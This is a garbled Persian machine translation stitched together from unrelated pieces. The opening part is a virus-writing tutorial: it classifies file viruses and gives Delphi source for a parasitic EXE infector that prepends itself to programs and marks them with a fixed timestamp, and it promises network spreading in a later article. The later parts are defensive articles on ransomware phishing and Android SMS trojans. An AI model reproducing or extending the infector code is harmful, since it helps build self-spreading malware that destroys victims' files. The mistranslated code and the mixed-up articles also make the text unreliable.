طبقه بندی

HLLO- بازنویسی زبان سطح بالا. چنین ویروسی برنامه را با بدنه خود بازنویسی می کند. آن ها
برنامه از بین می رود و زمانی که کاربر سعی می کند برنامه را اجرا کند، ویروس شروع به کار کرده و بیشتر "عفونت" می کند.

HLLC - همراه زبان سطح بالا. قدمت بیشتر این ویروس ها به دوران باستانی (8 تا 10 سال پیش) برمی گردد، زمانی که کاربران DOS داشتند و بسیار تنبل بودند. این ویروس ها به دنبال یک فایل می گردند و بدون تغییر آن، یک کپی از خود ایجاد می کنند اما با پسوند COM. اگر کاربر تنبلی به خط فرمانفقط نام فایل، سپس DOS ابتدا به دنبال فایل COM می گردد، ویروس را راه اندازی می کند، که ابتدا کار خود را انجام می دهد و سپس فایل EXE را راه اندازی می کند. اصلاح دیگری وجود دارد
HLLC - مدرن تر (7 سال؛)): ویروس نام فایل را تغییر می دهد، نام آن را حفظ می کند، اما پسوند را تغییر می دهد - مثلاً از EXE به OBJ یا MAP. ویروس فایل اصلی را با بدنه خود جایگزین می کند. آن ها کاربر ویروسی را راه اندازی می کند که با انجام عمل تولید مثل ، برنامه مورد نظر را راه اندازی می کند - همه خوشحال هستند.

HLLP - انگلی زبان سطح بالا. پیشرفته ترین. بدن آنها را به فایل جلویی نسبت دهید (ویروس ابتدا شروع می شود، سپس برنامه را بازیابی می کند و اجرا می کند) یا پشت
- سپس در هدر برنامه jmp near را روی بدنه ویروس می نویسیم، بالاخره ابتدا شروع می شود.

ما می توانیم خود برنامه را بدون تغییر رها کنیم، سپس به شکل زیر در می آید:

MZ چیست، فکر می کنم حدس زدید 🙂 این حروف اول مارک زبیکوفسکی محبوب شما است که او متواضعانه آن را به عنوان یک امضا شناسایی کرده است. فایل exe a 🙂 و من آنها را اینجا وارد کردم فقط برای اینکه متوجه شوید
- عفونت طبق اصل copy /b virus.exe program.exe رخ می دهد و در اینجا شوخی خاصی وجود ندارد. الان نه. اما ما آنها را با شما جمع می کنیم
- سلامت باشی :) خوب، به عنوان مثال: شما می توانید 512 بایت اول یا بیشتر از برنامه اصلی را با هر الگوریتمی که برای شما شناخته شده است رمزگذاری کنید - XOR/XOR، NOT/NOT، ADD/SUB، سپس به شکل زیر خواهد بود:

در این صورت ساختار فایل آلوده چندان واضح نخواهد بود.
بیخود نیست که من اینجا (از نظر طبقه بندی، به معنای) اینقدر مصلوب شده ام
- 90 درصد از الگوریتم انگلی استفاده می شود ویروس های مدرن، صرف نظر از نحوه توزیع آنها. خوب، بیایید ادامه دهیم:

ویروس شبکه می تواند هر یک از موارد بالا باشد. این تفاوت در توزیع آن نیست
محدود به یک کامپیوتر، این عفونت به نوعی از طریق اینترنت یا شبکه محلیبه ماشین های دیگر من فکر می کنم شما مرتباً 3-4 دوست از این قبیل را از جعبه صابون بیرون می آورید
- در اینجا یک نمونه از ویروس شبکه است. و یک بار در رایانه شخص دیگری، فایل ها را به روشی دلخواه آلوده می کند یا اصلاً آلوده نمی شود.

ویروس های ماکرو، ویروس های اسکریپت، ویروس های IRC. من آنها را در یک گروه قرار دادم زیرا آنها ویروس هایی هستند که به زبان های ساخته شده در برنامه ها (MSOffice :))، اسکریپت ها (قوانین VBS مورد علاقه شما در اینجا) و اسکریپت های IRC نوشته شده اند. به طور دقیق، به محض اینکه یک جزء برنامه نویسی به اندازه کافی قدرتمند (و/یا نشتی) در برخی از برنامه ها ظاهر می شود، بلافاصله شروع به نوشتن ویروس روی آن می کنند.

کد نویسی

ما متوجه شدیم 🙂 بیا، دلفی را اجرا کن، انواع ویندوز را بکش و تمام مزخرفات را از پنجره پروژه پاک کن. یعنی به طور کلی همه چیز را پاک کنید 🙂 ما فقط با DPR کار خواهیم کرد که حاوی:

برنامه EVIL_VIRUS؛
از ویندوز، سیستم ها استفاده می کند.
شروع
پایان؛

من فکر می کنم شما قبلاً منطق ویروس را از طبقه بندی فهمیده اید - ما برنامه را بازیابی و اجرا می کنیم --> منتظر می مانیم تا کار آن تمام شود --> "فایل اجرا شده" را پاک می کنیم (یادم رفت بگویم - ما درمان نمی کنیم برنامه آلوده، کد اصلی را به فایل سمت چپ منتقل می کنیم و مثال: فایل آلوده NOTEPAD.EXE فایل _NOTEPAD.EXE را در همان دایرکتوری با کد اصلی ایجاد می کنیم و آن را از قبل اجرا می کنیم.--> به دنبال یک فایل غیر آلوده بگردید. فایل و آلوده کنید. این همه چیز است 🙂 طراحی اولیه ویروس به این شکل است.

اکنون برای مغز قدرتمند خود متغیرها و ثابت های زیر را اعلام کنید:

VaR VirBuf، ProgBuf، MyBuf: آرایه char;
SR: TSearchRec;
My,pr: فایل;
ProgSize، نتیجه: عدد صحیح.
PN,st: String;
si:Tstartupinfo;
p:tاطلاعات پردازشی;
آلوده: بولی;
CONST VirLen: longint= 1000000;

خط اول آرایه های پویا است که در آن به ترتیب بدنه ویروس و برنامه را می نویسیم. متغیر SR نوشته خواهد شد
ویژگی های فایل یافت شده-کاندیدا برای عفونت (امیدوارم با مراحل FindFirst و FindNext آشنا باشید، زیرا بدتر خواهد شد؛))، من و
Pr فایلی است که از آنجا شروع کردیم و فایل سمت چپ با کد برنامه اصلی (قبلاً در مورد آن نوشتم). نتیجه - نتیجه عملیات FindFirst باید برابر با صفر باشد.
ProgSize - اندازه کد برنامه. بقیه از آنچه در ادامه می آید روشن است، جز
آلوده - این نشانه عفونت فایل یافت شده است و
VirLen طول کد ویروس است، شما فقط بعد از عروسی آن را تشخیص خواهید داد. اوه، من می خواستم بگویم بعد از تدوین. آن ها شما کامپایل می کنید، مقدار ثابت را در کد منبع تغییر دهید و دوباره کامپایل کنید.
کد بیشتر 🙂 در اینجا می توانید کد مسئول بازیابی و اجرای برنامه آلوده را مشاهده کنید:

SetLength (virbuf، VirLen)؛
AssignFile(my,ParamStr(0));
st:=paramstr(0);
St:= st+#0;
CopyFile (@st"c:\windows\program.exe"،false)؛
IF FileSize(my)> VirLen سپس
شروع
//برنامه را شروع کنید
AssignFile(my,"c:\windows\program.exe)؛
ریست (من)؛
ProgSize:= FileSize(my)-VirLen;
BlockRead (my,virbuf,virlen);
SetLength (progbuf، pRogSize)؛
BlockRead (my,progbuf,progSize)؛
CloseFile(my);
پ.ن:= "_"+ParamStr(0);
AssignFile (pr,pn);
بازنویسی (pr);
BlockWrite (pr، progbuf، progSize)؛
CloseFile(pr);
FillChar(Si, SizeOf(Si) , 0);
با سی انجام دهید
شروع
cb:= SizeOf(Si);
dwFlags:= startf_UseShowWindow;
wShowWindow:= 4;
پایان؛
پ.ن:= PN+#0;
Createprocess(nil,@PN,nil,nil,false,Create_default_error_mode,nil,nil,si,p);
waitforsingleobject(p.hProcess,infinite);
//راه اندازی شد، برنامه کامل شد. پاکش کنیم 🙂
ErAsE(pr);
پاک کردن (من)؛

همه چیز در اینجا، در اصل، ساده و واضح است، به جز اینکه چرا کل فایل آلوده را به دایرکتوری ویندوز منتقل کردم و خطوط 3 تا 5 را شامل می شود.
و من این کار را به دلیل خواندن از فایل در حال اجراناراحت کننده و تنها با استفاده از CreateFile و ReadFile WinAPI امکان پذیر است. من بعداً در مورد کدنویسی در WinAPI صحبت خواهم کرد، اکنون فقط به اصول اولیه می پردازم
- در دلفی

این خطوط تبدیل رشته به pchar به روش عامیانه هستند، زیرا ما اکنون در حال مبارزه برای هر بایت کد هستیم. نکته دیگر: من با سختی مسیر c:\windows را اشتباه عمل کردم. بهتر است از رویه GetWindowsDirectory استفاده کنید، مطمئن شوید که 🙂 بقیه چیزها بدون هیچ نظری واضح است (اگر نه
دست از انفورماتیک بردارید؛))، بیایید ادامه دهیم:

نتیجه:= FindFirst("*.exe",faAnyFile,sr);
WHILE نتیجه= 0 DO
شروع
// بررسی شپش
آلوده:= نادرست;
IF DateTimeToStr (FileDateToDateTime (fileage (sr.name)))= "08/03/98 06:00:00" سپس آلوده شد:= true;
//بررسی شد!
IF (infected= false) و (sr.name<>paramstr(0)) سپس
شروع
AssignFile (my,sr.Name)؛
بازنویسی (من)؛
BlockWrite (my,virbuf,virlen)؛
BlockWrite (my,progbuf,sr.Size)؛
CloseFile(my);
FileSetDate (sr.Name,DateTimeToFileDate(StrToDateTime("08/03/98 06:00:00")));
پایان؛
پایان؛

//اگر ویروس "تمیز" در حال اجرا باشد، به عنوان مثال. نه از یک برنامه آلوده، سپس خارج شوید
end else halt;

شما چیه چشم تیزبیناینجا را می بیند؟ درست است، رویه FindFirst به دنبال قربانی معین (هر فایل exe از دایرکتوری فعلی) می گردد، ویژگی های آن را به متغیر SR منتقل می کند. سپس باید آن را از نظر عفونت بررسی کنید. این به روشی اصلی انجام می شود: هنگامی که آلوده می شود، یک فایل یک def اختصاص می یابد. تاریخ و زمان. و هر فایلی با چنین ویژگی هایی آلوده به حساب می آید. همه چیز دیگر دوباره بسیار ساده است ، بنابراین من به آرامی به نتیجه می رسم 🙂

نتیجه

بنابراین ما اولین ویروس خود را کدگذاری کرده ایم. تا کنون، فقط می تواند فایل های موجود در دایرکتوری فعلی را آلوده کند (البته من مطمئن هستم که می توانید به راحتی آن را ارتقا دهید؛)) و در مورد سایر دایرکتوری ها و اینترنت چیزی نمی داند. ناامید نباش، به زودی او را راه اندازی می کنیم. در حال حاضر، با این خطوط بازی کنید و منتظر مقاله بعدی باشید.

کاربرد

من جرأت می‌کنم تمام روش‌های مورد استفاده در مقاله را به شما توضیح دهم. این به شما کمک می کند تا آنها را در راهنما جستجو کنید و برای کدگذاری ویروس های جدی با استفاده از آن آماده شوید
WinAPI.

AssignFile - بدون آنالوگ در WinAPI - یک فایل را نقشه برداری می کند
با متغیر نوعفایل یا TextFile

Reset - آنالوگهای _lopen و CreateFile - باز می شود
فایل موجود و تنظیم موقعیت
خواندن بالا

ReWrite - _lcreate و CreateFile - ایجاد می کند فایل جدیدو
دهان موقعیت خواندن تا ابتدا اگر تغذیه شود
یک فایل موجود، محتویات آن را دوباره بنویسید
بازنشانی خواهد شد

BlockRead - _lread و ReadFile - در بافر خوانده می شود
مقدار معینی از داده از یک فایل

BlockWrite - _lwrite و WriteFile - به ترتیب می نویسد
داده به فایل

SeekFile - _llseek و SetFilePointer - جابجایی موقعیت
خواندن/نوشتن در یک فایل باز

CloseFile - _lclose و CloseHandle - یک باز را می بندد
فایل

پاک کردن - حذف فایل - حذف یک فایل

FindFirst - FindFirstFile - یک فایل را با معیارها جستجو کنید

FindNext - FindNextFile - فایل بعدی را جستجو کنید

با ادمین جن گیر تماس بگیرید! رئیس حسابدار ویروس قدرتمندی گرفت، همه چیز از بین رفت! موقعیتی مکرر و مکرر بر اساس عامل انسانی، روندهای جدید ویروس و عزم هکرها. و واقعاً، اگر می‌توانید در این زمینه به کارمندان شرکت تکیه کنید، چرا خودتان به نرم‌افزار شخص دیگری سر بزنید.

بله، محصولات شرکت های بزرگ دولتی و خصوصی به طور مداوم هک می شوند، اگرچه صدها نفر از افراد با تجربه روی ایجاد و پشتیبانی از آنها کار می کنند.

و حتی بیشتر از آن، یک فرد معمولی چیزی برای مخالفت با هکرها ندارد. در عین حال، هیچ کس به یک حساب تنها نیاز ندارد، هدف هکرها به دست آوردن پایگاه بزرگی از قربانیان احتمالی و پردازش آن با نامه های زنجیره ای، هرزنامه یا ویروس است. و ما خودمان تمام اطلاعات شخصی-عمومی را به راست و چپ توزیع می کنیم.

آخرین روندهای ویروسی

یکی از ویژگی‌های متمایز همه ویروس‌ها و تکنیک‌های هک اخیر این است که با یک شخص ارتباط برقرار می‌کنند، نه با یک سیستم. یعنی خود قربانی این روند را شروع می کند. نام دارد " مهندسی اجتماعی"- روشی برای دسترسی غیرقانونی به اطلاعات، بر اساس ویژگی های روانشناسی انسان. و اگر مهاجمان قبلی مجبور بودند به کارآگاهان واقعی تبدیل شوند، اهداف خود را ردیابی کنند، ارتباط برقرار کنند، گاهی اوقات حتی در یک شرکت هک شده شغل پیدا کنند، اکنون می توانیم تشکر کنیم. شبکه های اجتماعی. آنها روند جمع آوری اطلاعات را بسیار ساده و تسریع کردند.

با مراجعه به VK، Twitter، FB و Instagram مورد نظر خود، می توانید مشخصات دقیق یک شخص را با شماره تلفن، ایمیل، نام والدین، دوستان و سایر جزئیات دریافت کنید. و این همه رایگان و داوطلبانه است - از آن استفاده کنید، عزیز!

چه می شود اگر کلاهبرداران به آن دسترسی پیدا کنند پست شرکتییکی از کارمندان شما، ارسال هرزنامه نه تنها همه افراد شرکت، بلکه مشتریان شما را نیز تهدید می کند. در موردی دیگر، هکرها با ارسال نوعی «گزارش» به نامه، رایانه کارمند را برای مدت طولانی غیرفعال می کنند.

هکرها در حال برنامه ریزی برای حمله به افرادی هستند که با اطلاعات ارزشمند کار می کنند - منشی ها، مدیران، حسابداران، منابع انسانی.

از آنجایی که بازیابی اسناد، سیستم‌ها، وب‌سایت‌ها یا دریافت گذرواژه‌ها برای شما هزینه زیادی داردما باید بفهمیم که با چه چیزی سر و کار داریم. برای اینکه همه این "مهندسین اجتماعی" نتوانند از شما پول نقد کنند، بیایید یکی از جدیدترین طرح های ویروسی را تجزیه و تحلیل کنیم.

"کریپتیست ها"

ویروس باج افزار از طریق آن پخش می شود پست الکترونیکتحت پوشش اسناد جدی: احضار دادگاه، فاکتورها، درخواست از اداره مالیات. و برای اینکه خودتان آن را نصب نکنید، باید به هر دو طرف نگاه کنید. تکنسین های ما به طور خاص یکی از این ویروس ها را تجزیه و تحلیل کردند تا بتوانیم به شما نشان دهیم که باید به دنبال چه چیزی باشید:

ما دستان این شعبده بازان را دنبال می کنیم:

  • عنوان تهدید کننده «اخطار برای حضور در دادگاه» به معنای «احضار به دادگاه» است. بچه ها سعی می کنند کاربر را بترسانند و مجبور کنند نامه را باز کند.
  • آدرس فرستنده - [ایمیل محافظت شده]این به وضوح نشان می دهد که این یک نامه رسمی نیست، بلکه یک هرزنامه / هکر است.
  • آرشیو نامه. فایلی در آنجا وجود دارد که باید فوراً به شما هشدار دهد (نام فایل شامل .doc است، اما پسوند js - ویروس خود را به عنوان یک سند Word پنهان می کند)

توجه!اگر رایانه به باج افزار آلوده شده باشد، به احتمال 95٪ اطلاعات برای همیشه از بین می رود. پس از دانلود و راه اندازی فایل مخرب، با یک سرور راه دور که کد ویروس از آن دانلود می شود، تماس گرفته می شود. تمام داده های کامپیوتر با یک توالی تصادفی از کاراکترها رمزگذاری می شوند.

برای "رمزگشایی" فایل ها، به کلیدی نیاز دارید که فقط یک هکر در اختیار دارد. کلاهبردار قول می دهد که اطلاعات را برای مقدار مشخصی رمزگشایی کند، اما به دور از قطعیت است که این اتفاق بیفتد. برای چی؟ خیلی ساده تر است که شخص را بدون پول و بدون داده رها کنید: قراردادها، اعمال، سفارشات، هرگونه اطلاعات ارزشمند و حساس. پس چیکار میکنی پشتیبان گیریبه خصوص اسناد مهم، شما بهتر می خوابید. در این شرایط، این تنها محافظت 100٪ شما در برابر ویروس ها است.

با توجه به ویژگی های فوق، قادر خواهید بود از موارد خطرناک مسدود کردن رایانه و حذف آن جلوگیری کنید اطلاعات مهم. در هر صورت، رفع عواقب آسیب پذیری های حیاتی بسیار گران تر از اقدامات احتیاطی خواهد بود.

بنابراین در اینجا 6 نکته دیگر برای شناسایی ویروس ها و جلوگیری از عفونت آورده شده است:

1. سیستم عامل و برنامه های خود را به طور منظم به روز کنید.به روز رسانی های مهمی که به طور پیش فرض به طور خودکار نصب می شوند را می توان غیرفعال کرد. اما این کار را نکنید، زیرا نسخه های جدید اغلب حفره های کشف شده در امنیت نرم افزار را می بندند.

2. یک آنتی ویروس نصب کنید و پایگاه داده ویروس را به طور منظم به روز کنید. هر روز 100 هزار ویروس جدید وجود دارد!

3. نمایش پسوندهای فایل: Control Panel\Folder Options\View\Advanced Options را فعال کنید، تیک گزینه "Hide extensions for known file types" را بردارید و روی OK کلیک کنید. به این ترتیب شما همیشه پسوند فایل واقعی را خواهید دید. اغلب، ویروس های پوشانده شده به این شکل هستند: filename.doc.js و filename.pdf.exe. پسوندهای واقعی فایل js و exe هستند و هر چیزی که قبل از آنها وجود دارد بخشی از نام فایل است.

4. از فایل های مهم خود - اسناد کاری و عکس ها بک آپ بگیرید. دوره ای کپی رزرو کنیدشما باید بسته به فراوانی تغییرات فایل را انتخاب کنید. برای ذخیره سازی پشتیبان، اگر به شما امکان می دهد به نسخه های قدیمی فایل ها برگردید و همگام سازی دستی را تنظیم کنید، می توانید از یک سرویس ابری استفاده کنید. سپس در صورت آلودگی کامپیوتری، ویروس وارد فضای ابری نخواهد شد. همچنین توصیه می کنیم یک کپی از داده های مهم خود را در بایگانی نگه دارید.اکثر ویروس ها نمی توانند به بایگانی نفوذ کنند و پس از ضد عفونی شدن رایانه، تمام اطلاعات آرشیو شده بازیابی می شوند.

5. سواد حرفه ای متخصصان خود را بالا ببرید!همانطور که قبلاً گفتیم، هکرها حملات خود را با روانشناسی ما تنظیم می کنند و دائماً تکنیک های خود را بهبود می بخشند. انتظار نداشته باشید که غیر از شرکت و تیم شما، اطلاعات شما را کلیک/آپلود/وارد کند. هر کسی می تواند گرفتار شود، وظیفه فقط انتخاب قلاب مناسب برای یک فرد است. بنابراین، کارمندان خود را حداقل به صورت فردی، حداقل به صورت تیمی، حداقل به شکلی بازیگوش، حداقل به نحوی آموزش دهید!

6. نامه‌های ارسالی، پیام‌های موجود در پیام‌رسان‌های شرکتی و سایر اطلاعات دریافتی را به دقت زیر نظر داشته باشید. آدرس های ایمیل، پیوست ها و محتوای ایمیل فرستندگان را بررسی کنید. بیشتر ویروس ها قبل از اینکه به رایانه شما آسیب برسانند باید به صورت دستی اجرا شوند.

ما واقعا امیدواریم که این مقاله را برای پیش نمایش می خوانید، نه به این دلیل که همه چیز در حال حاضر بد است. ما آرزو می کنیم که هرگز با هرزنامه های کنترل نشده، اسناد از دست رفته به مدت شش ماه و سایر پیامدهای خوشایند ویروس های آلوده مواجه نشوید. شش مرحله بالا را دنبال کنید، چشمان خود را باز نگه دارید و اطلاعات خود را خصوصی نگه دارید!

کاربران همیشه قادر به تشخیص ویروس در تلفن همراه خود نیستند و بر این اساس، امکان پاک کردن برنامه مخرب یا انجام هیچ اقدامی قبل از دسترسی ویروس به اطلاعات شخصی وجود ندارد.

در این لحظهگوشی های هوشمند اندرویدی آسیب پذیرترین آنها محسوب می شوند. ویروس جدیدی از طریق پیامک در اندروید ظاهر شد.

در گوشی های هوشمند با متن باز، که در واقع همینطور است سیستم عاملاندروید، ویروس های جدید با سرعت باورنکردنی در حال انتشار هستند.

حالا آنها تغییر کرده اند. قبلا فقط سعی می کردند از پول در تلفن همراه استفاده کنند، اما امروز زیر اسلحه هستند کارت های بانکیو تمام وجوهی که در اینترنت بانک است. کلاهبرداران در درجه اول به گوشی های هوشمندی که از خدمات بانک موبایل پشتیبانی می کنند علاقه مند هستند. به شما امکان می دهد از حساب قربانی به شماره کلاهبردار پول بدزدید. برای این کار ویروس را از طریق پیامک به اندروید می فرستند.

نحوه عملکرد کلاهبرداران

اولین چنین ویروسی در اوایل تابستان 2017 فعال شد. خطر این است که تروجان از راه دور بر روی یک تلفن هوشمند اندرویدی کار می کند.

مهاجمان پیامک را به شماره مورد نظر ارسال می کنند، بنابراین برای شناسایی وجود این ویروس در گجت تلفن همراه خود، دارندگان گوشی های هوشمند باید به رشد تعداد پیامک های SMS به ارزش هر کدام 100 روبل توجه کنند. در نتیجه مبلغی مضربی از 100 از حساب تلفن همراه صاحب گوشی هوشمند برداشت می شود.

برای به دست آوردن پول قابل توجه، مهاجم مجبور می شود چندین تروجان اس ام اس را از شماره قربانی خود ارسال کند. بالاخره او تنها کسی نیست که در این زنجیره کلاهبرداری کار می کند.

تروجان در ابزار قربانی ساکن می شود و پیام های SMS را از شماره قربانی به شماره "گران قیمت" کلاهبرداران ارسال می کند. و برای این پیامک های خطاب به این شماره "گران قیمت" است که از قربانی هر کدام 100 روبل دریافت می شود. برای هر پیامک غیرمجاز

واسطه‌های این طرح می‌توانند اپراتور مخابراتی، ارائه‌دهنده و سایر شرکای باشند که ممکن است از ترفندهای کلاهبرداران اطلاعی نداشته باشند. برای پوشش تمام هزینه ها و کسب درآمد، مهاجم باید حداقل 1000 روبل از هر شماره برداشت کند.

در عین حال، این احتمال را نمی توان رد کرد که دارندگان گوشی های هوشمند ممکن است از اپراتور خود در مورد سرقت پول شکایت کنند. و سپس اقدامات تلافی جویانه ای را انجام می دهند که از تقلب جلوگیری می کند. به عنوان مثال، آنها می توانند یک ورودی مورد نیاز را وارد کنند تایید اضافیقبل از برداشت پول و غیره در چنین شرایطی، مهاجمان مجبور می شوند به دنبال راه های جدیدی برای کلاهبرداری باشند.

به لطف این عوامل، یک تروجان دیگر ظاهر شد. این نماینده Trojan-SMS دستورات را از یک سرور راه دور نیز اجرا می کند.

ویروس جدیددر هر شرایطی که از قبل موانع را در نظر می گیرد، انعطاف پذیرتر و کاملاً جهت گیری است اپراتور تلفن همراهو حتی وضعیت حساب مشترک و زمان تراکنش ها.

نحوه عملکرد ویروس

ویروس جدید خفته است - استقلال ندارد. حتی یک بار در گوشی هوشمند، به هیچ وجه ظاهر نمی شود. برای اینکه کار کند به یک فرمان از راه دور از طرف صاحب تلفن نیاز دارد.

برای این کار از یک درخواست به اصطلاح POST استفاده می شود. برای درخواستی در نظر گرفته شده است که در آن وب سرور داده های محصور شده در متن پیام را برای ذخیره سازی می پذیرد. به عنوان مثال، اغلب برای دانلود یک فایل استفاده می شود.

استفاده از درخواست POST به شما امکان می دهد با آن ارتباط برقرار کنید سرور راه دورو دستور مناسب را دریافت کنید که با دریافت آن تروجان شروع به ارسال پیامک های گران قیمت از شماره قربانیان خود به شماره های کلاهبرداران می کند.

تروجان جدید چگونه کار می کند؟ به عنوان مثال، برنامه به طور خودکار پیام های SMS را با یک کلمه "BALANCE" به شماره ای که از "Mobile Banking" پشتیبانی می کند ارسال می کند.

ارسال پیامک ج شماره کوتاهبنابراین، کلاهبرداران می توانند بررسی کنند که آیا شماره قربانی به یک حساب بانکی مرتبط است یا خیر و وضعیت حساب چگونه است.

نمونه های زندگی واقعی

به عنوان مثال، Sberbank دارای شماره ای است که از آن پیام ها ارسال می شود - 900. وقتی پیام "BALANCE" (یا احتمالاً به زبان روسی "تعادل") از فرستنده 900 می آید، صاحب تلفن به Sberbank اعتماد کرده و مطمئن است. که این پیام از طرف این بانک است، پیام را باز می کند و به آن پاسخ می دهد و می خواهد بداند برای موجودی چه اتفاقی افتاده است. بنابراین، کلاهبرداران پاسخی به پیامک خود دریافت می کنند که برای آنها به این معنی است که الف کارت بانکی. علاوه بر این، برای آنها روشن می شود که این کارت را می توان با استفاده از دستورات پیامکی که در سرویس بانکداری تلفن همراه گنجانده شده است، کنترل کرد. و سپس، همانطور که می گویند، "مسئله فناوری".

یکی از دوستان من اخیراً پیام هایی از شماره کوتاه 4-74-1 دریافت کرده است که در بانک تلفن همراه Sberbank با پیام "سرویس در دسترس نیست، لطفاً بعداً دوباره امتحان کنید" ثبت شده است. به دلایل واضح، او با آگاهی از تهدیدات احتمالی، پاسخی ارسال نکرد. بدیهی است که اینها همان کلاهبردارانی هستند که خود را به عنوان یک بانک موبایل در می آورند و سعی می کنند واکنش او را از این طریق محاسبه کنند و مشخص کنند که آیا بانک موبایل روی تلفن هوشمند او نصب شده است یا خیر.